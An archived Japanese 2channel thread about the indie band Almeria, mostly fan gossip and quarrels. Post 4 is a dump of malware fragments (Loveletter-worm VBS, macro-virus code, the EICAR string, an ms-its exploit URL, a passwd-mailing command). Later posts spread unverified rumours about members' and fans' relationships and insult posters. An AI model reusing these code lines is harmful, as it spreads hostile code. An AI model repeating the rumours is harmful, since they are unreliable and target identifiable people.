5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

アルメリア.2

1 :名無しさん@お腹いっぱい。:2006/10/12(木) 00:43:09 ID:FpUt3+Zq0
世界で一番大好きです。

2 :名無しさん@お腹いっぱい。:2006/10/12(木) 00:53:51 ID:1r14wpzm0
2

3 :名無しさん@お腹いっぱい。:2006/10/12(木) 01:03:40 ID:EWTWgk4mO


4 :名無しさん@お腹いっぱい。:2006/10/12(木) 07:14:02 ID:gh3erEAI0
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

5 :名無しさん@お腹いっぱい。:2006/10/12(木) 23:50:36 ID:EWTWgk4mO
こんばんみ

6 :名無しさん@お腹いっぱい。:2006/10/13(金) 00:35:33 ID:qyIJqvWGO
星 35歳
康平 28歳
英樹 14歳





嘘デシー(゚Д゚)

7 :名無しさん@お腹いっぱい。:2006/10/13(金) 20:04:10 ID:eVaeP+8pO
全然回らなくなっちゃったねー。

8 :名無しさん@お腹いっぱい。:2006/10/14(土) 01:45:51 ID:w5FpMol0O
盤スレ新しく立ったのか!

シモテGはオキニいないのけ?立候補してもヨシ?ww
漏れの中で最近アツイぉw浮いた話キキタス!
鍵盤は年上好きってマヂカ?ま〇みは英樹狙い?
voも好きだキロ見守るコトにする、夏に目黒逝ったトキ見たコトナイ笑顔(⌒ー⌒)でデカ目と話してたし・・あれじゃカテネww
漏れは病んでそな前髪シノラーのツレのがバロスオキニだがwwwまたライヌ行くぉw

9 :名無しさん@お腹いっぱい。:2006/10/15(日) 02:52:14 ID:cZ+GMWP6O
↑あまり来ない香具師なんですか?康平くんは前からすごかったよ?(><)
私がわかるだけでも2月頃からかな?最初あの子は出待ちしなかったみたいで、会話してる処は見なかったけどイノベ前の4月あたり?はよく見た。
一度消えたけど今は来てるし、よく話してるよ。確かに康平くんよく笑うようになったし、優しい顔してるよね。でもそれはいい事なんじゃないかな?
誰か本家に書いてたけど、笑顔が一番って私もそう思うよ!アルメリア全員大スキだ!!(><)

10 :名無しさん@お腹いっぱい。:2006/10/15(日) 02:53:51 ID:cZ+GMWP6O
あと…ま〇みの悪口やめてください(><)

11 :名無しさん@お腹いっぱい。:2006/10/15(日) 14:17:16 ID:o0kYISIDO
オキニって皆が言ってるのって、結局は昔からライブ行ってるこだったりするんでしょ?
メンバーと仲良くなりたいなら、なれるのに…
人間誰だって、自分に好意的な人の前では優しい表情にもなるよね?
何にしても信頼関係じゃない?
前、オキニと一緒に居たら親しくなれるかもとかあったけど、無理!
オキニはオキニ、連れは連れ(笑)

12 :名無しさん@お腹いっぱい。:2006/10/15(日) 16:36:12 ID:cZ+GMWP6O
私も↑さんに同感です、オキニさんと親しくなってもメンバーのオキニにはなれないと思います(><)
人間だから相性あるし、気が合う人なら一緒にいたいですよね。
私は可愛いと嫉妬しちゃいますけど、器ちっさいですね(;_;)

13 :名無しさん@お腹いっぱい。:2006/10/15(日) 20:41:55 ID:OBGIok9M0
康平サソかっこいい(^_^)


14 :名無しさん@お腹いっぱい。:2006/10/15(日) 21:59:41 ID:kPB9YGMkO
かっこいいよね(´∀`)
漏れは好き★

15 :名無しさん@お腹いっぱい。:2006/10/16(月) 00:56:47 ID:eOMa5d+PO
カキADEATH★★
チッタ楽しかったネ、キャッキャイ(≧▽)♪
某盤にゎ勝てなぃけどぉ!!!!!!!!aha(o^v^o)ノシ

ォィラ先週別のライブでオキニ見かけたぉぉ!!!!!!!!!!!!!!
てゅーかぁooo
話しかけちゃったーいo(_ _o)ウヒョヒョヒョヒョ!!!!!!!!!だってアルメファソいないからverychanceでぇ!!!!!!!
ここで見たコーヘイの話、全部話しちったびョーん(火暴)
“アルメファソに聞いた噂”って話したけどウピョぢゃないンで許してNё( ̄▽ ̄;)ノシノシ

16 :名無しさん@お腹いっぱい。:2006/10/16(月) 01:24:10 ID:eOMa5d+PO
Ahちなみにォィラゎ固定ぢゃないけどファソだぉ!!!!!よく行くライブ聞いたらアルメリアの話なってコラすンげぃ★☆★bigchance☆★☆v(`∀´v)ウッシャッシャ
んで⇒暴露しまくりDEATH〃♪でもなんか感触なくてヌルイo(_ _)
アポみたいに明るいからvery頭ヨワかと思ったけどプギャ
""食えなぃ女""メガウザスっw
┗|嘶┓♪┏|嘶┛
コーヘイここ見てるデショ(o^-'*)b
前スレネタ彼氏ぃる♀と遊びまくりとかぁ〜〜〜( ̄▽ ̄)ォィラしゃべっちゃったカラ⇒★★ワリャワリャ
あの子知ってるよぉwwプッ

17 :名無しさん@お腹いっぱい。:2006/10/16(月) 19:27:31 ID:4XCRxmgLO
ここの麺と繋がってる人っているの?

18 :名無しさん@お腹いっぱい。:2006/10/16(月) 20:51:57 ID:eOMa5d+PO
オキニゎ違うの?????ワリャ(^◇^)
でもどっちかってゅーと友達ぽくNё???????(`・ω・´?)コーヘイアレだかりゃ顔で狙ってるわけじゃないだろうけどぉ!!!!!

バロスバリnew⇒⇒⇒⇒(屮゜Д゜)屮⇒⇒⇒⇒Aha♪ゞゞ

前スレで言われてたオキニの噂ッてあるGtサソの噺????だったらコーヘイなンか相手しなぃとオモ、顔のレベル違いすぎぢゃンか!!!!!!!!ニョホホホウピッ☆★☆(宦Q)ノシ★☆☆

19 :名無しさん@お腹いっぱい。:2006/10/16(月) 21:42:48 ID:4XCRxmgLO
なんて書いてあるかわかりづらいよー(´Д`;)

20 :名無しさん@お腹いっぱい。:2006/10/16(月) 22:18:22 ID:eOMa5d+PO
ゴミンチャー(TёT)

21 :名無しさん@お腹いっぱい。:2006/10/17(火) 00:03:59 ID:GPGJjqgpO
ま、可愛いからいいと思うよw
アルメリアのライブはよく行くの?

22 :名無しさん@お腹いっぱい。:2006/10/17(火) 00:44:31 ID:H8mXO9xXO
最近ゎ月TぁるかなぃかDEATH♪ゞゞ
でもラィステ=チッタ=KW行ったA^^ノシ
ここ見るファソとも友達or顔見知りの筈!!!!!!名乗リャないけどAhaw
でも今月ゎ無理DEATHNё(>З<)残念!!!!!!!!!!!
だって本命盤違うシ!!!!(火暴)ギャヒッ
コーヘイの顔見たかったなぁぁぁ(^▽'*)
COOL装っても内心↓↓↓↓↓↓


OH My sweet Ni バレタ…!!!!!(((゚Д゜;;)))ハワワワワ


ンなってそぉー!!!!!!!キャッキャッ
結構ハッキリ謂う子みたぃだかリャ⇒⇒面白おかしぃムードンなりそなのにNё★☆★
Ah見たかったぉ!!!!!!!!!(怫刧)ξξ

23 :名無しさん@お腹いっぱい。:2006/10/17(火) 04:29:06 ID:9mnSI8MoO
↑↑↑バカだぉw

プップッ(*つД`*)

24 :名無しさん@お腹いっぱい。:2006/10/17(火) 15:24:21 ID:H8mXO9xXO
授業終わったyo⇒⇒ォィラはveryバカですが何か???????
( ̄∀ ̄*))))ウヒョヒョヒョヒョ知ってますシ⇒⇒ノシ

だってマヂウケりゅSI⇒⇒♪♪♪♪♪

ォィラゎファソだけどNё
┗|嘶┓♪┏|嘶┛
コーヘイゎ微妙だシ、今ごろ必死DEイイワケ考えてンベソ★☆★
アルメゎャッパギター少年でしょぉ!!!!!!!!!!!!(o^v^o)

25 :名無しさん@お腹いっぱい。:2006/10/17(火) 18:43:04 ID:f5FxqbeK0


26 :名無しさん@お腹いっぱい。:2006/10/17(火) 23:13:56 ID:GPGJjqgpO
康平好きだから狙いたいんだけどオキニの子って可愛いの?
オキニいるなら無理かな?

27 :名無しさん@お腹いっぱい。:2006/10/17(火) 23:43:58 ID:4qpt2bVUO
正直オキニはいないよ。
バカがみんなで騒いでるだけだからワラ

28 :名無しさん@お腹いっぱい。:2006/10/17(火) 23:45:11 ID:J7rpfLA4O


29 :名無しさん@お腹いっぱい。:2006/10/17(火) 23:50:32 ID:H8mXO9xXO
ぁりぇNё⇒⇒くらぃ目童がデッカィ子ダョ、言葉訛ッテたしハーフなンかも???????日本でぁの顔ゎナイぉ、ぁったらマヂウラヤマピーだぉ

ォィラのダチッコゎ英樹andコーヘイ好きだケド黙認してりゅ(`・ω・´)
コーヘイ嘘つけなくてバレAだしNё⇒⇒o(_ _o)
ォィラ含めファソ微妙だし華やかなカワユぃると目のイ呆養になるぉ(o^∇'*)ノシノシ
てかコーヘイ自分ゎぁンな顔してvery⇒⇒面食い!!!!!!!!!ワロス(ΘoΘ;)

30 :名無しさん@お腹いっぱい。:2006/10/17(火) 23:51:06 ID:GPGJjqgpO
そうなの?
じゃぁ、狙えるかなー。でもファンの子は相手にしそうにないよね。

31 :名無しさん@お腹いっぱい。:2006/10/17(火) 23:56:45 ID:H8mXO9xXO
>>27ド新規?????ワリャ

32 :名無しさん@お腹いっぱい。:2006/10/18(水) 15:48:32 ID:o5lF2rHfO


33 :名無しさん@お腹いっぱい。:2006/10/18(水) 16:25:31 ID:RWiEdLJRO


34 :名無しさん@お腹いっぱい。:2006/10/18(水) 17:21:49 ID:sCF+V+tFO
y

35 :名無しさん@お腹いっぱい。:2006/10/18(水) 20:08:26 ID:Pyu6OpchO
明日羅犬だね☆楽しみ!
みんな行く?

36 :名無しさん@お腹いっぱい。:2006/10/18(水) 21:02:32 ID:o5lF2rHfO
漏れ行くぉ

37 :名無しさん@お腹いっぱい。:2006/10/18(水) 22:38:07 ID:nVe2z2D0O
マジレスするけどお気にっぽい椰子は康平の友達の、元カノ。
その友達はバンドマンで康平とかなり親しい。
そのバンドファンに有名な話だけど二人の関係を康平が知っていたかは、判らないけれど小文字の椰子が言う通り面食いだからお気にかもしれない。
元カノなら遠慮はないだろうしね。




……………
ここまで書いたらバレるかな?(汗)
まぁ私はライブもあんまり見ないし、アルメリア麺は顔も判らないだろうからいいか!σ(^◇^;)

38 :名無しさん@お腹いっぱい。:2006/10/18(水) 22:53:08 ID:VQrS+5XgO
メンバーってみんなバイトやってんのかな?ソックリさんかもしれんが神奈川県の西の方でトラックに乗った星を良くみる

39 :名無しさん@お腹いっぱい。:2006/10/19(木) 11:17:48 ID:GS3/kuk7O
>>37 それってTさんかKさん?
違ってたらごめん!

40 :40:2006/10/19(木) 11:18:53 ID:GS3/kuk7O
連投ごめん、友達のバンドマンってTさんかKさん?

41 :名無しさん@お腹いっぱい。:2006/10/19(木) 23:09:00 ID:6ZVjWKJ9O
羅犬どうだった?

42 :名無しさん@お腹いっぱい。:2006/10/20(金) 23:45:08 ID:wqWpR7CWO
んョョョョョョョョュ

43 :名無しさん@お腹いっぱい。:2006/10/20(金) 23:56:37 ID:wt/Sg62UO
昨日いたけど康平と俊介なぜか微妙だった。体調?

44 :名無しさん@お腹いっぱい。:2006/10/21(土) 06:12:11 ID:gLiVv3nHO
体調悪そうではなかった気がするよー!!
何だろうね、私は普通に見えたけどな。

45 :名無しさん@お腹いっぱい。:2006/10/21(土) 14:57:06 ID:oGPZN+nxO
既出人物の奇人って目黒のロリだよね、ライブ後来てビックシだぉ。写メ撮ろうかと思ったwキョドりすぎフィーバーしてたけど、ゆ〇と並ぶ名物w同じ臭を感じるぉ(^◇^)

奇人は無問題だけど連れの長い髪の子さ、あのメイクやめた方がいいと思うぉ。元来パッチリなのにあのアイラインはやりすぎかとw挨拶するつもりだったのに、すれ違う時目にビビッたぉ。前はカワユスだったのに余計近寄り難い。来月こそ話できるかな?(^◇^)

46 :名無しさん@お腹いっぱい。:2006/10/22(日) 00:51:08 ID:5EXJ3r7fO
ヒサブサ降臨wwキャッキャイ♪♪┗|嘶┓♪┏|嘶┛
しかも目黒行ったシ⇒⇒(>∀<*)
ォィラ相棒いたから噺しなかった`オキニ会釈してくれたぁwォィラを覚えてたんだNё★☆★
塚キジンてだれぇ?????ォィラ帰った後の噺だぉNё???ライヌゎ一人だしょ?????
塚のカキまぢワロス!!!!!!!確かに目童Power↑UP↑してたwあンな塗らなくてもカワユなのにNё( ̄▽ ̄;)


47 :名無しさん@お腹いっぱい。:2006/10/22(日) 01:17:53 ID:5EXJ3r7fO
ァト>>37サソいる⇒⇒????????もしかしてォィラ好盤と同じファソだったりちて…!?!?!?カンチだたらスンマソ;;;orz
あの子ャケにギスギスしてたよぉに見えたぉ、ォィラがコーヘイネタチクったせい????キャッ(゚▽゚?)
気ィ強そだ`Nё、BUT乙女ゎ弱ぃもの!!!!!陰で泣いてるカモYO(ΘoΘ;)
チクったォィラが言うなって?????(火暴)
コーヘイ喧嘩して泣かされてそぅだNёプギャー( ̄▽ ̄;)
初めて話しかけた時あの子結構コーヘイ堕としてた`、仲良くなきゃぁぁゎ言わないシ???まぁA好かれてンぢゃナイ(o^-'*)b


48 :名無しさん@お腹いっぱい。:2006/10/22(日) 10:29:12 ID:SCCqt9h4O
なんか、喪舞うざい!!

49 :名無しさん@お腹いっぱい。:2006/10/22(日) 11:08:55 ID:G3SNTOtJO
確かにウザイ
どこに事実があるのか分かんないけど、明らかにあんたはウザイ!
早く失せな

50 :名無しさん@お腹いっぱい。:2006/10/22(日) 16:20:38 ID:5EXJ3r7fO
ウザスで結構DEATH⇒⇒(*^ー^*)v
2チャソだから火暴れンだ`Nё⇒⇒⇒( ̄▽ ̄;)

51 :名無しさん@お腹いっぱい。:2006/10/22(日) 16:49:21 ID:7605+YpIO
目黒で康平と仲よさ気に話してた子がいたんだけど、ライブでは見た事ない子だった。
ライブも後ろで見てたし話してすぐ帰ったみたいなんだけど。

52 :名無しさん@お腹いっぱい。:2006/10/22(日) 17:33:08 ID:pk8C3WRI0
>>50 とか
痛い子は現実でもウザイおもわれてそうだよな
2ちゃんだからとかじゃなくて常に叩かれてそうwww

>>51 kwsk

53 :名無しさん@お腹いっぱい。:2006/10/22(日) 18:07:39 ID:7605+YpIO
ちらっと見ただけだけど、お互い凄い笑顔で楽しそうに話してた。

その子の顔はよく見えなかったけど結構可愛い感じだった気がするよ!

54 :名無しさん@お腹いっぱい。:2006/10/23(月) 23:00:48 ID:Hdva4q4qO
>>37だけど……
>>47が同じバンドファンだったら引く;;
塚書き方直せば?馬鹿丸出し!私は本命バンドだから名前言わないよ!
頭弱そうとか言うけど、甘く見ない方が為だよ。噂あった時私の連れ一喝されたし。
そんな年変わらないのに随分しっかりしてる、だからあんたも全部話して怒られてみれば?
売らないけど売られた喧嘩は買う子と思う。2chで吠えるあんたよりは馬鹿じゃないしょ。何がしたいのか判らない(笑)

55 :名無しさん@お腹いっぱい。:2006/10/24(火) 21:44:11 ID:ZL/whTll0
ゴジラ

56 :名無しさん@お腹いっぱい。:2006/10/24(火) 21:56:53 ID:Z/L7cweCO
↑↑一喝って怒鳴られたの?そんな子に見えないけどなぁ。

57 :54:2006/10/25(水) 12:29:52 ID:9RVCgMwMO
怒鳴られてないよ;;注意程度、彼女に完璧な正論を言われて友達黙ったし(汗)
だから私は顔見知りだよ、ごくたまにアルメリア見るだけで康平とは全然だけど。
でもあの2人仲良いよね、康平があんなはしゃぐ事なんてあるんだね〜。意外だったけど可愛かったよ、康平の友達含めてみんな雰囲気似てるもんね。





……………
身バレしそうだなw
もう面識ないからいいか(^^;)

58 :名無しさん@お腹いっぱい。:2006/10/26(木) 20:54:13 ID:hM96wHWxO
>>54ォィラゎバカですが何か??プギャー(^ё^)テラテラウザス★☆★☆★(火暴)

59 :名無しさん@お腹いっぱい。:2006/10/26(木) 22:04:02 ID:ZUGhQLas0
バカはもうネタつきたみたいだな!妄想乙www

60 :名無しさん@お腹いっぱい。:2006/10/26(木) 22:49:30 ID:hM96wHWxO
>>59みたいなオタにゎ関係無(o^v^o)
妄想と思ってればwwカワイソー┗|嘶┓♪┏|嘶┛


61 :名無しさん@お腹いっぱい。:2006/10/26(木) 23:28:53 ID:XX4/jWqYO
ばかはお母さんのおっぱいでもしゃぶって寝てなワラ

62 :名無しさん@お腹いっぱい。:2006/10/26(木) 23:53:50 ID:XX4/jWqYO
ママ!ママー!ワラ

63 :名無しさん@お腹いっぱい。:2006/10/27(金) 01:10:46 ID:5CTg+/KMO
ここ厨ばっかな!内情とか本人達しかわからんべ?ここで事実わかるか?小文字の椰子も女に暴露って、そいつは喪舞には何か話したのか?話してないからネタないだろ?voか女に妬みか知らんが、糞不安の厨よりはvoを信頼してるだろ、大恥かいたな。長文すまん

64 :名無しさん@お腹いっぱい。:2006/10/27(金) 09:53:21 ID:NI4xDP+F0
面白いくらい釣られるなwww

まあ何があろうと私はアルメリア好きだし
バカをからかうのは楽しいwww

65 :名無しさん@お腹いっぱい。:2006/10/27(金) 16:45:56 ID:5CTg+/KMO
>>64みたいな下衆になったら終わりだな

66 :名無しさん@お腹いっぱい。:2006/10/27(金) 17:41:52 ID:NI4xDP+F0
君まで食いつくなよ(笑)
どちらかと言うと>>60らへんに言ったんだけどw

実際、メンバーも内情話す相手くらい選ぶでしょ
そこまでバカじゃないと信じてるんだがwww
そうでもないのかね?

67 :名無しさん@お腹いっぱい。:2006/10/27(金) 22:28:13 ID:5CTg+/KMO
バカだと思うならバカで遊ぶよりスルーが一番だがな、漏れもしきれんかったから文句も言えないか。小文字は明らかバカだろ、事実もあるかもしれないが康平が泣かされて(そう)とかは妄想だろ?

68 :名無しさん@お腹いっぱい。:2006/10/27(金) 23:14:06 ID:y2CJbiyqO
ヒント:2チャンに真実なんて皆無

69 :名無しさん@お腹いっぱい。:2006/10/27(金) 23:30:02 ID:5CTg+/KMO
皆無ではないだろ、まーファンには内情なんか関係ないからほっとけや。知らない方が楽だ。親しくもないファンにメンバーや女が事実を話すとは思えんしな。>>60が話してもらえんいい例だったな。

70 :名無しさん@お腹いっぱい。:2006/10/28(土) 22:50:23 ID:84o8j19u0
バカばっかだね。
ファンなら純粋に応援しなよ。

71 :名無しさん@お腹いっぱい。:2006/10/28(土) 22:51:29 ID:o11OF1InO
康平の話ウザス、アルメリアは英樹で持ってるんだからね!英樹がいなきゃ魅力ないし(笑)
英樹☆萌え!!
白があんなに似合うヒーローは他にいない!!

72 :名無しさん@お腹いっぱい。:2006/10/28(土) 22:54:04 ID:o11OF1InO
>>66
>>70

73 :名無しさん@お腹いっぱい。:2006/10/29(日) 16:11:59 ID:Hv3qifV+O
>>71 わたしも英樹好きだけど萌えでゎないなー(笑)

英樹の笑顔が見たいぞー(^◇^)

74 :名無しさん@お腹いっぱい。:2006/10/29(日) 17:00:27 ID:w3HEA6LW0
>>72 70は私じゃないですよwww

75 :名無しさん@お腹いっぱい。:2006/10/29(日) 21:49:33 ID:Hv3qifV+O
英樹ーダイスチw

76 :名無しさん@お腹いっぱい。:2006/10/30(月) 18:21:44 ID:XoSeMsZ1O
英樹はそんなにかっこよくないぞ!

77 :名無しさん@お腹いっぱい。:2006/10/30(月) 21:42:01 ID:gpv+ZKMFO
塚池はいないから

78 :名無しさん@お腹いっぱい。:2006/10/31(火) 22:48:30 ID:CxspDSihO
一番人気の筈の英樹ネタが上がらないのはなぜだ?
不自然だな、めんばでこのスレ上げてたらバロスw
プッ(・∀・)

漏れは最近よく見るけど、顔は普通でも確かに英樹は一番イイとオモw(・∀・)

あとオキニらしき女、毎回思うんだがフレイムに顔そっくりだぞw
だから漏れも顔は好みだ!(・∀・)



79 :名無しさん@お腹いっぱい。:2006/11/01(水) 04:08:57 ID:ZpPveRVpO
フレイムってなんだ?

80 :名無しさん@お腹いっぱい。:2006/11/02(木) 14:41:44 ID:/c0nq0+qO
オモチャのフライムなら分かるぉww

81 :名無しさん@お腹いっぱい。:2006/11/03(金) 01:43:45 ID:pFTtWjIsO
フレイムは前人気あった男アイドルだぉ(・∀・)

あの中の双子が、女になったらあの女みたいだとオモw(・∀・)

確かにカワユだがどうも小悪魔っぽいなw漏れはヌサだが見習うべきかww(・∀・)






アイタタ基地外こないな?ツマラナス(・∀・)

82 :名無しさん@お腹いっぱい。:2006/11/04(土) 00:20:36 ID:yywWWwdgO
回らないねage

83 :名無しさん@お腹いっぱい。:2006/11/04(土) 10:25:53 ID:X4Jjf9X2O
別盤スレでま〇〇言われてたけど可哀想だぉ。良い子だから止めてほしいぉ。
カワユスも男に似てるトカ可哀想だぉ。漏れはヌサイクだからあのカワユス裏山シス・・・絶対リーダー面食いだもん。あの子みたいなカワユスに生まれたかったぉ(*>;*)
あの子リーダーと話さないよね、話してたら漏れジェラシーで睨むかも・・・。既出だけどどうして奇人と仲良しなんだろう?漏れもありえない組み合わせだと思うぉ。でもゆ〇とも挨拶だけしてたし、奇人好きとか?^^

84 :名無しさん@お腹いっぱい。:2006/11/05(日) 19:23:52 ID:N+DJLhQ2O
別盤スレって
スパイラルフリーのことか?

85 :名無しさん@お腹いっぱい。:2006/11/05(日) 23:47:48 ID:3pbsenSyO
ヤッパま〇み英樹ラヴなの?別に良いぢゃん、ガンガレばw
元彼で康平の友達って誰だぁ(´・Д・)気にナル、随分前にどっかのライヴハウスでイチャこいてるの見たけど、金髪のシト?違ったらスマソorz

86 :名無しさん@お腹いっぱい。:2006/11/06(月) 11:29:09 ID:qBY6Bw19O
最初から読んだんだけど、奇人=ロリイタ?
あの色白な子は康平の妹or血筋じゃないの?
よく見ると顔のパーツそっくり。だからお気に香具師とも仲良くしてんじゃない?

87 :名無しさん@お腹いっぱい。:2006/11/06(月) 22:21:44 ID:ERDXsVNhO
康平に妹はいないよーワラ

88 :名無しさん@お腹いっぱい。:2006/11/06(月) 22:44:56 ID:qBY6Bw19O
従兄弟とかは?血筋だってあの顔ww

89 :名無しさん@お腹いっぱい。:2006/11/07(火) 00:43:26 ID:XsthgC7nO
そんなに似てるか?ワラ

それにしてもこのスレ回らないな

あっても意味がないよね…そー思わない?

90 :名無しさん@お腹いっぱい。:2006/11/07(火) 02:34:59 ID:Qp9RdEAoO
奇人と似てる?顔よく見ないから分らないぉw


顔立ちのせいかなあ、奇人より連れの子ばっかり派手で気になるぉw
漏れ実は不安なのかも…orz


康平の友ネタはいいんジャマイカ?誰だろうと関係ナスw


奇人羅犬でチェキラだ!




91 :名無しさん@お腹いっぱい。:2006/11/08(水) 12:08:06 ID:DnijzKLYO
ここファン同士は仲良い方だよね〜?
いつも一人でツルまない黒髪の女いるじゃん?
そいつがす〜ごい形相でオキニを睨んでたからさ〜、実際どうなんだ?トカ思ってしまった(笑)
オキニが全く気づいてないのにも笑えたしW
前レスの康平の友達の盤ファン?実はあの子だとか?何か私怨がなきゃ〜あんな形相にはならないだろう、びっくりした(笑)

92 :名無しさん@お腹いっぱい。:2006/11/09(木) 13:47:46 ID:fpr6bjof0
そいつ元カノだぉ(●´艸`)モフッ

93 :名無しさん@お腹いっぱい。:2006/11/09(木) 16:33:32 ID:OiIDFNDjO
マジネタ?元カノの嫉妬?だからカワユに嫉妬かww

94 :名無しさん@お腹いっぱい。:2006/11/09(木) 17:13:21 ID:OiIDFNDjO
すごい形相かはしらんけど、黒髪はよくニラんでね?オキニやファソ苛めてたらワロスw
塚康平は面食いって話じゃなかったのか?ww^^
オキニもせっかく池な彼いたのに康平ファソだったら趣味悪スギ&好きモノすぎてマヂテラキモス


あ り え ね w ^ ^

95 :名無しさん@お腹いっぱい。:2006/11/09(木) 19:48:11 ID:xD6fd7trO
>>91
もとから
そういう顔なんじゃないのwww

96 :名無しさん@お腹いっぱい。:2006/11/09(木) 22:04:18 ID:OiIDFNDjO
明日ライヌ行く椰子いる?
アレが元カノなら康平面食いではないな、ヌサファソは良かったなw
ま。今まで康平がカワユに相手されなかったんだろうなw
塚オキニの美意識は本当おかしいと思うがw何故康平なんだ?せめて英樹にしとけ、Tさんがカワイソw

97 :名無しさん@お腹いっぱい。:2006/11/10(金) 01:30:57 ID:i5fV+FLLO
>>92事実なら素で引く;;
>>96は康平かお気にに恨みがあるの?なんかすごい私怨を感じるんだけど;;

98 :名無しさん@お腹いっぱい。:2006/11/10(金) 01:54:41 ID:i5fV+FLLO
連投orz
元カノが釣りじゃないなら最悪だね…女一人切れないんだ。みんな心配しなくてもお気には康平相手しないと思うよ?彼女はそんな半端な事する男嫌いな筈だよ。元彼とはまだ切れてないみたいで、友達の康平にも親切にしてるってだけじゃない?また対バンもありそうだし。




康平と友達すごい仲良いけど、2人の付き合いは知ってるのかな?別バンファンの私としてはそれが気になる(^^;)


99 :名無しさん@お腹いっぱい。:2006/11/10(金) 04:44:42 ID:QKmqOsSqO
康平って繋がり多いの?
漏れ繋がってんだけど…。
いっぱい女いるなら切ろうかなww

100 :名無しさん@お腹いっぱい。:2006/11/10(金) 08:08:23 ID:i5fV+FLLO
繋がりってどの程度?

101 :名無しさん@お腹いっぱい。:2006/11/10(金) 14:31:04 ID:QKmqOsSqO
漏れはメールしてるだけだけど。ってか、してた…かな?
友達が康平と仲良しとか書いてあるから繋がり多いのかな?とか思って!

102 :名無しさん@お腹いっぱい。:2006/11/10(金) 19:14:03 ID:i5fV+FLLO
それは繋がりと言うか友達じゃん;;メールする相手もいなかったら寂しくない?(笑)それぐらいならいると思う。
お気には性格上、密はやらないだろうなぁ。ただすごく仲良いのは事実、まぁ元彼の営業のために康平と話してるのかもしれないけど(^^;)

103 :名無しさん@お腹いっぱい。:2006/11/10(金) 19:30:32 ID:RYFaSa2tO
繋がってる子いるならセフとかいるのかな?

104 :名無しさん@お腹いっぱい。:2006/11/11(土) 03:42:32 ID:w1vlX75LO
セフとかいそうだよね!
康平って軽そうじゃんwww

105 :名無しさん@お腹いっぱい。:2006/11/11(土) 07:59:31 ID:zd2AV1xRO
そーか?腰の重いメンドくさがりに見えるが。

106 :名無しさん@お腹いっぱい。:2006/11/11(土) 14:07:13 ID:iOXMJbS8O
皆さん

妄想

トーク

炸裂

ですねw

普通に

苦笑い

してしまったw

107 :名無しさん@お腹いっぱい。:2006/11/11(土) 15:48:31 ID:Eo8RKSF8O
てめーらアルメリアが好きなら黙って応援すりゃーいーじゃねーか 
セフレだとかオキニだとかきもいんだよ

108 :名無しさん@お腹いっぱい。:2006/11/11(土) 17:35:28 ID:iOXMJbS8O
>>107
ヒント:2ch

しかし、V板用語はやめない?

109 :名無しさん@お腹いっぱい。:2006/11/11(土) 18:25:02 ID:rJ191V+U0
>>108
ヒント:所詮はV上がり

110 :名無しさん@お腹いっぱい。:2006/11/11(土) 18:37:00 ID:zd2AV1xRO
別にアルメリアが好きなら口出す事じゃなくない?いそうとかただの妄想じゃん。むしろこんな下世話な不安がいてアルメリア可哀想だ。

111 :名無しさん@お腹いっぱい。:2006/11/11(土) 20:26:01 ID:+DBY2ymsO
軌道発売記念パーティーライブって…










結局ただの対バン。

もうなんとかしてぇ。あのバカで無意味なプロデュース。

112 :名無しさん@お腹いっぱい。:2006/11/11(土) 20:50:40 ID:zd2AV1xRO
そんないまさら・・・

113 :名無しさん@お腹いっぱい。:2006/11/11(土) 23:28:34 ID:F8XcoanDO
ありえもしない事ばっか書いてあほじゃね?
潰したいなら名前出せば良いじゃん

ファンとしては女関係とか顔なんてどーでもいいんだよ!

音楽さえ聴ければ良いし

こうやっておんながどうこうっていってるやつは本命とかでも相手にされてないだけでしょ?

いい加減ウザイ

曲も聴かないで男の事しか追っかけてない寂しいお前ら、早く死んでくれ

114 :名無しさん@お腹いっぱい。:2006/11/12(日) 00:39:46 ID:i2Gcn4y0O
>>111 仲良し集めて身内で祝うってことじゃないの?
噂だとなんかパーティーっぽい事するらしいよー?

115 :名無しさん@お腹いっぱい。:2006/11/12(日) 11:07:27 ID:zMJzH0nLO
不安が微妙だからさ、あのカワユス見るとジェラシるんじゃない?んで妄想に走ると。むしろ麺やあの子に同情するねw

116 :名無しさん@お腹いっぱい。:2006/11/13(月) 01:23:41 ID:CMQtfY6UO
微妙でスマンなw



星と康平はタメだぉね、25だっけ?



英樹まぢラブリー

117 :名無しさん@お腹いっぱい。:2006/11/14(火) 14:02:21 ID:BEoaY7ORO
昼の野外って何時から?行けるかなー

118 :名無しさん@お腹いっぱい。:2006/11/14(火) 14:08:44 ID:FqaK9Ic5O
それ気になるよね!
場所もよくわかんないんだけど…。

119 :名無しさん@お腹いっぱい。:2006/11/14(火) 14:16:50 ID:BEoaY7ORO
噴水広場ってどこだぁ〜、来月もだよね。
1月からはライブあるの?
漏れ久振りにロリに会いたひw

120 :名無しさん@お腹いっぱい。:2006/11/14(火) 14:27:09 ID:FqaK9Ic5O
